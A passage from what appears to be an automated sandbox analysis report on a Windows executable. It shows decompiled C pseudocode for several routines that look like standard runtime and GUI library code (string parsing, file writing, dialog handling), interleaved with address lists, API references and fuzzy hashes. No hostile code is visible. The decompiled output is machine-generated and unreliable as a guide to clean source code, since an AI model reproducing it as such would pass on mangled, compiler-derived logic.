				intOrPtr _t37;
				void* _t42;
				intOrPtr _t43;
				signed int _t46;
				char* _t47;
				signed int _t48;
				void* _t49;
				void* _t54;
				void* _t55;
				intOrPtr* _t60;
				char* _t61;
				char* _t62;
				void* _t66;
				void* _t70;
				void* _t72;
				void* _t80;
				char* _t81;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				void* _t89;
				void* _t91;
				void* _t92;

				_t89 = _t91 - 0x78;
				_t92 = _t91 - 0x94;
				_t35 =  *0x457184; // 0xc72e1596
				_push(__ebx);
				_push(__esi);
				_t83 = __edx;
				_push(__edi);
				 *((intOrPtr*)(_t89 + 0x74)) = _t35;
				_t76 = __ecx;
				if(__edx == 0) {
					 *(_t89 - 0x18) = 1;
					 *((intOrPtr*)(_t89 - 0x14)) = 0;
					if(__ecx == 0) {
						L24:
						_t36 = E00415A51();
						L25:
						_t84 = _t36;
						L26:
						_t37 = _t84;
						L27:
						return E00412FBB(_t37,  *((intOrPtr*)(_t89 + 0x74)));
					}
					if( *__ecx != 0x4c ||  *((char*)(__ecx + 1)) != 0x43 ||  *((char*)(__ecx + 2)) != 0x5f) {
						_push(0);
						_t84 = E00415B10(0, _t76, _t83, _t76, _t89 - 0x10, 0, 0);
						if(_t84 == 0) {
							goto L26;
						}
						_t86 = 0;
						_t60 = 0x4576cc;
						do {
							if(_t60 == 0x4576cc) {
								goto L36;
							}
							_t42 = E00416EE0(_t89 - 0x10,  *_t60);
							_pop(_t66);
							if(_t42 == 0) {
								L35:
								 *((intOrPtr*)(_t89 - 0x14)) =  *((intOrPtr*)(_t89 - 0x14)) + 1;
								goto L36;
							}
							_push(_t89 - 0x10);
							_t46 = E00415C6C(_t60, _t66, 0x4576cc, _t86);
							if(_t46 != 0) {
								goto L35;
							}
							 *(_t89 - 0x18) =  *(_t89 - 0x18) & _t46;
							L36:
							_t60 = _t60 + 0xc;
							_t86 = _t86 + 1;
						} while (_t60 <= 0x457708);
						if( *(_t89 - 0x18) == 0) {
							if( *((intOrPtr*)(_t89 - 0x14)) != 0) {
								goto L24;
							}
							_t84 = 0;
							goto L26;
						}
						_t43 = E00415A51();
						_push( *0x4576cc);
						_t84 = _t43;
						E00412A4D();
						 *0x4576cc = 0;
						goto L26;
					} else {
						while(1) {
							L8:
							_t47 = E0041ACD0(_t76, 0x44bf18);
							_t61 = _t47;
							_pop(_t70);
							if(_t61 == 0) {
								break;
							}
							_t48 = _t47 - _t76;
							 *(_t89 - 0x18) = _t48;
							if(_t48 == 0 ||  *_t61 == 0x3b) {
								break;
							} else {
								 *(_t89 - 0x1c) = 1;
								_t87 = 0x4576d4;
								while(1) {
									_t49 = E0041AC90( *_t87, _t76, _t48);
									_t92 = _t92 + 0xc;
									if(_t49 != 0) {
										goto L15;
									}
									L14:
									_t55 = E00411A30( *_t87);
									_pop(_t70);
									if( *(_t89 - 0x18) == _t55) {
										L16:
										_t62 = _t61 + 1;
										_t80 = E00419CA0(_t70, _t62, 0x44a9dc);
										_pop(_t72);
										if(_t80 != 0 ||  *_t62 == 0x3b) {
											_t88 =  *(_t89 - 0x1c);
											if( *(_t89 - 0x1c) <= 5) {
												E0041ADB0(_t89 - 0x10, _t62, _t80);
												_push(_t89 - 0x10);
												 *((char*)(_t89 + _t80 - 0x10)) = 0;
												_t54 = E00415C6C(_t62, _t72, _t80, _t88);
												_t92 = _t92 + 0x10;
												if(_t54 != 0) {
													 *((intOrPtr*)(_t89 - 0x14)) =  *((intOrPtr*)(_t89 - 0x14)) + 1;
												}
											}
											_t81 = _t80 + _t62;
											if( *_t81 == 0) {
												L23:
												_t84 = 0;
												if( *((intOrPtr*)(_t89 - 0x14)) == 0) {
													goto L26;
												}
												goto L24;
											} else {
												_t76 = _t81 + 1;
												if( *_t76 != 0) {
													goto L8;
												}
												goto L23;
											}
										} else {
											goto L28;
										}
									}
									L15:
									 *(_t89 - 0x1c) =  *(_t89 - 0x1c) + 1;
									_t87 = _t87 + 0xc;
									if(_t87 <= 0x457704) {
										_t48 =  *(_t89 - 0x18);
										_t49 = E0041AC90( *_t87, _t76, _t48);
										_t92 = _t92 + 0xc;
										if(_t49 != 0) {
											goto L15;
										}
										goto L14;
									}
									goto L16;
								}
							}
						}
						L28:
						_t37 = 0;
						goto L27;
					}
				}
				if(__ecx == 0) {
					_t84 =  *((intOrPtr*)(0x4576cc + (__edx + __edx * 2) * 4));
					goto L26;
				}
				_push(__ecx);
				_t36 = E00415C6C(0, __ecx, __ecx, __edx);
				goto L25;
			}





























                                                                              0x00415efc
                                                                              0x00415f00
                                                                              0x00415f06
                                                                              0x00415f0b
                                                                              0x00415f0c
                                                                              0x00415f0d
                                                                              0x00415f13
                                                                              0x00415f14
                                                                              0x00415f17
                                                                              0x00415f19
                                                                              0x00415f3c
                                                                              0x00415f43
                                                                              0x00415f46
                                                                              0x0041602c
                                                                              0x0041602c
                                                                              0x00416031
                                                                              0x00416031
                                                                              0x00416033
                                                                              0x00416033
                                                                              0x00416035
                                                                              0x00416044
                                                                              0x00416044
                                                                              0x00415f4f
                                                                              0x00416049
                                                                              0x00416056
                                                                              0x0041605d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416064
                                                                              0x00416066
                                                                              0x00416068
                                                                              0x0041606a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416072
                                                                              0x0041607a
                                                                              0x0041607b
                                                                              0x00416090
                                                                              0x00416090
                                                                              0x00000000
                                                                              0x00416090
                                                                              0x00416080
                                                                              0x00416081
                                                                              0x00416089
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041608b
                                                                              0x00416093
                                                                              0x00416093
                                                                              0x00416096
                                                                              0x00416097
                                                                              0x004160a4
                                                                              0x004160c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004160cd
                                                                              0x00000000
                                                                              0x004160cd
                                                                              0x004160a6
                                                                              0x004160ab
                                                                              0x004160b1
                                                                              0x004160b3
                                                                              0x004160b9
                                                                              0x00000000
                                                                              0x00415f69
                                                                              0x00415f69
                                                                              0x00415f69
                                                                              0x00415f6f
                                                                              0x00415f74
                                                                              0x00415f79
                                                                              0x00415f7a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415f80
                                                                              0x00415f82
                                                                              0x00415f85
                                                                              0x00000000
                                                                              0x00415f94
                                                                              0x00415f94
                                                                              0x00415f9b
                                                                              0x00415fa5
                                                                              0x00415fa9
                                                                              0x00415fae
                                                                              0x00415fb3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415fb5
                                                                              0x00415fb7
                                                                              0x00415fbf
                                                                              0x00415fc0
                                                                              0x00415fd0
                                                                              0x00415fd0
                                                                              0x00415fdc
                                                                              0x00415fe1
                                                                              0x00415fe2
                                                                              0x00415fe9
                                                                              0x00415fef
                                                                              0x00415ff7
                                                                              0x00415fff
                                                                              0x00416000
                                                                              0x00416005
                                                                              0x0041600a
                                                                              0x0041600f
                                                                              0x00416011
                                                                              0x00416011
                                                                              0x0041600f
                                                                              0x00416014
                                                                              0x00416019
                                                                              0x00416025
                                                                              0x00416025
                                                                              0x0041602a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041601b
                                                                              0x0041601b
                                                                              0x0041601f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041601f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415fe2
                                                                              0x00415fc2
                                                                              0x00415fc2
                                                                              0x00415fc5
                                                                              0x00415fce
                                                                              0x00415fa2
                                                                              0x00415fa9
                                                                              0x00415fae
                                                                              0x00415fb3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415fb3
                                                                              0x00000000
                                                                              0x00415fce
                                                                              0x00415fa5
                                                                              0x00415f85
                                                                              0x00416045
                                                                              0x00416045
                                                                              0x00000000
                                                                              0x00416045
                                                                              0x00415f4f
                                                                              0x00415f1d
                                                                              0x00415f2e
                                                                              0x00000000
                                                                              0x00415f2e
                                                                              0x00415f1f
                                                                              0x00415f20
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcspn_strlen_strncpy_strpbrk
                                                                              • String ID:
                                                                              • API String ID: 635841138-0
                                                                              • Opcode ID: e19c258571297ee5d62cbf7ff9b59757b7ff0b38a4be4591f85e023f3adecf67
                                                                              • Instruction ID: 694c5e4b68b2525d694b7d296c557faaa049b66dd6c3df7d1911cec21b6ecaf4
                                                                              • Opcode Fuzzy Hash: e19c258571297ee5d62cbf7ff9b59757b7ff0b38a4be4591f85e023f3adecf67
                                                                              • Instruction Fuzzy Hash: 1E51FB72D046169EDF31DBA8D8806FF7BA89B48355F26003FD90092202E77DCDC18799
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041C951, Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041C951(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x457184; // 0xc72e1596
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x45bb20 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0041DE46(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E004141FA())) = 0x1c;
								_t81 = E00414203();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E0041420C( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E004141FA())) = 9;
									_t81 = E00414203();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E00412FBB(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}






















                                                                              0x0041c952
                                                                              0x0041c95f
                                                                              0x0041c965
                                                                              0x0041c96d
                                                                              0x0041c973
                                                                              0x0041c976
                                                                              0x0041c979
                                                                              0x0041c999
                                                                              0x0041c9a2
                                                                              0x0041c9a5
                                                                              0x0041c9aa
                                                                              0x0041c9b6
                                                                              0x0041c9bb
                                                                              0x0041c9c0
                                                                              0x0041c9c2
                                                                              0x0041c9c6
                                                                              0x0041caac
                                                                              0x0041cab2
                                                                              0x0041cab4
                                                                              0x0041cac7
                                                                              0x0041cab6
                                                                              0x0041cab9
                                                                              0x0041cabc
                                                                              0x0041cabc
                                                                              0x0041c9cc
                                                                              0x0041c9cc
                                                                              0x0041c9d8
                                                                              0x0041c9db
                                                                              0x0041c9de
                                                                              0x0041cad7
                                                                              0x0041cad7
                                                                              0x0041cad9
                                                                              0x0041cade
                                                                              0x0041caef
                                                                              0x0041caf4
                                                                              0x0041cafa
                                                                              0x0041caff
                                                                              0x0041cb01
                                                                              0x0041cb01
                                                                              0x0041cb09
                                                                              0x00000000
                                                                              0x0041cb0a
                                                                              0x0041cae6
                                                                              0x0041cae9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041caeb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c9e4
                                                                              0x0041c9e4
                                                                              0x0041c9e7
                                                                              0x0041c9e7
                                                                              0x0041c9ed
                                                                              0x0041c9f0
                                                                              0x0041c9f3
                                                                              0x0041c9f3
                                                                              0x0041c9f9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041c9fe
                                                                              0x0041ca01
                                                                              0x0041ca03
                                                                              0x0041ca04
                                                                              0x0041ca07
                                                                              0x0041ca09
                                                                              0x0041ca0c
                                                                              0x0041ca0f
                                                                              0x0041ca10
                                                                              0x0041ca10
                                                                              0x0041ca10
                                                                              0x0041ca10
                                                                              0x0041ca13
                                                                              0x0041ca15
                                                                              0x0041ca16
                                                                              0x0041ca19
                                                                              0x0041ca19
                                                                              0x0041ca27
                                                                              0x0041ca39
                                                                              0x0041ca3f
                                                                              0x0041ca41
                                                                              0x0041ca68
                                                                              0x0041ca6b
                                                                              0x0041ca6b
                                                                              0x0041ca6b
                                                                              0x0041ca6d
                                                                              0x0041ca6d
                                                                              0x0041ca70
                                                                              0x0041ca72
                                                                              0x0041cb06
                                                                              0x0041cb06
                                                                              0x00000000
                                                                              0x0041cb06
                                                                              0x0041ca78
                                                                              0x0041ca7b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ca7f
                                                                              0x0041ca80
                                                                              0x0041ca83
                                                                              0x0041cacf
                                                                              0x0041ca85
                                                                              0x0041ca8a
                                                                              0x0041ca90
                                                                              0x0041ca95
                                                                              0x0041ca95
                                                                              0x00000000
                                                                              0x0041ca83
                                                                              0x0041ca43
                                                                              0x0041ca46
                                                                              0x0041ca49
                                                                              0x0041ca4b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ca56
                                                                              0x0041ca58
                                                                              0x0041ca58
                                                                              0x0041ca60
                                                                              0x00000000
                                                                              0x0041c97b
                                                                              0x0041c97b
                                                                              0x0041cb0b
                                                                              0x0041cb1e
                                                                              0x0041cb1e

                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0041CA39
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 8ebb063f3d866f9ad221dbab5504306a6d2adffb96bdd848906d3512f42142ed
                                                                              • Instruction ID: 9b7bc8997f4c9871630646bb4369b77f4a0b577739990f79f079e00e1d6e7872
                                                                              • Opcode Fuzzy Hash: 8ebb063f3d866f9ad221dbab5504306a6d2adffb96bdd848906d3512f42142ed
                                                                              • Instruction Fuzzy Hash: 81517971940248CFCB22CFA9DC81BEEBBB8FF45744F20015AE8559B252D7749A81CF15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004297D0, Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004297D0(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x457184; // 0xc72e1596
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E00429643(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E004296C2(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E0041229D(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E00411E00(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E00411E00(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E00412FBB(_t74, _v8);
			}





















                                                                              0x004297d6
                                                                              0x004297e1
                                                                              0x004297e4
                                                                              0x004297e7
                                                                              0x004297fa
                                                                              0x00429808
                                                                              0x00429810
                                                                              0x00429825
                                                                              0x00429827
                                                                              0x0042982a
                                                                              0x00429832
                                                                              0x0042982c
                                                                              0x0042982c
                                                                              0x0042982c
                                                                              0x00429841
                                                                              0x00429861
                                                                              0x00429864
                                                                              0x0042986a
                                                                              0x0042986f
                                                                              0x00429871
                                                                              0x0042987d
                                                                              0x0042987d
                                                                              0x00429881
                                                                              0x00429884
                                                                              0x00429888
                                                                              0x0042988c
                                                                              0x0042988f
                                                                              0x00429896
                                                                              0x00429899
                                                                              0x004298a1
                                                                              0x0042989b
                                                                              0x0042989b
                                                                              0x0042989b
                                                                              0x004298a8
                                                                              0x004298ba
                                                                              0x004298bf
                                                                              0x004298bf
                                                                              0x004298c9
                                                                              0x004298d9
                                                                              0x004298de
                                                                              0x004298e9
                                                                              0x004298ec
                                                                              0x004298f2
                                                                              0x004298f8
                                                                              0x00429843
                                                                              0x00429843
                                                                              0x00429843
                                                                              0x004297e9
                                                                              0x004297e9
                                                                              0x004297e9
                                                                              0x00429905

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalLocklstrlen
                                                                              • String ID:
                                                                              • API String ID: 1144527523-0
                                                                              • Opcode ID: 29ddfb22baa628da98e68220e70986c6928251943950cc1292bd65acfbf16da3
                                                                              • Instruction ID: 452fcb5b433e365645a6f424daf5e7e636f50435a02cce441dbc97542f236fcc
                                                                              • Opcode Fuzzy Hash: 29ddfb22baa628da98e68220e70986c6928251943950cc1292bd65acfbf16da3
                                                                              • Instruction Fuzzy Hash: 7D410131A0022AEFCB14EFA4D98489EBBB9FF04344F14812AE816D7281DB78D945CB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004288C0, Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E004288C0(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E0042317D( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E00409D70( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E00409D70( &_a4)));
								_v8 =  *((intOrPtr*)(E00409D70( &_a4)));
								if((E00428511(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E00409A88( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E00409A88( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E00428511(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                              0x004288c3
                                                                              0x004288c4
                                                                              0x004288c7
                                                                              0x004288ce
                                                                              0x004288d4
                                                                              0x004288d9
                                                                              0x004288e9
                                                                              0x00428902
                                                                              0x0042890a
                                                                              0x00428912
                                                                              0x00428915
                                                                              0x0042891f
                                                                              0x00428960
                                                                              0x00428935
                                                                              0x00428939
                                                                              0x00428946
                                                                              0x00000000
                                                                              0x00428948
                                                                              0x00428948
                                                                              0x0042894e
                                                                              0x00000000
                                                                              0x004289bb
                                                                              0x004289bb
                                                                              0x004289bb
                                                                              0x00000000
                                                                              0x004289bb
                                                                              0x0042894e
                                                                              0x00000000
                                                                              0x00428946
                                                                              0x0042896b
                                                                              0x00428975
                                                                              0x004289b4
                                                                              0x0042898b
                                                                              0x00428990
                                                                              0x00428993
                                                                              0x004289a8
                                                                              0x004289a8
                                                                              0x004289b2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00428995
                                                                              0x004289a3
                                                                              0x00000000
                                                                              0x004289a5
                                                                              0x004289a5
                                                                              0x00000000
                                                                              0x004289a5
                                                                              0x004289a3
                                                                              0x00000000
                                                                              0x00428993
                                                                              0x004288eb
                                                                              0x004288f4
                                                                              0x004288f9
                                                                              0x004288fc
                                                                              0x004289be
                                                                              0x004289c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004288fc
                                                                              0x004289c9
                                                                              0x004289c9
                                                                              0x004288d9
                                                                              0x004289cd

                                                                              APIs
                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004288F4
                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00428959
                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0042899E
                                                                              • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004289C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: defb69aa44ea9b6ef244ba1429e771591f6ec37fecd5fcbf61daf03dcdfbb22c
                                                                              • Instruction ID: d25d3bae2880c768a6284a6a98cce408474638340b47f4c28727e17993ccddcf
                                                                              • Opcode Fuzzy Hash: defb69aa44ea9b6ef244ba1429e771591f6ec37fecd5fcbf61daf03dcdfbb22c
                                                                              • Instruction Fuzzy Hash: D73189B0642128ABCB24DF55D880EBE7BA9EF41394F50406FF5059B252CA389DC0DB9A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00429EA9, Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00429EA9(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
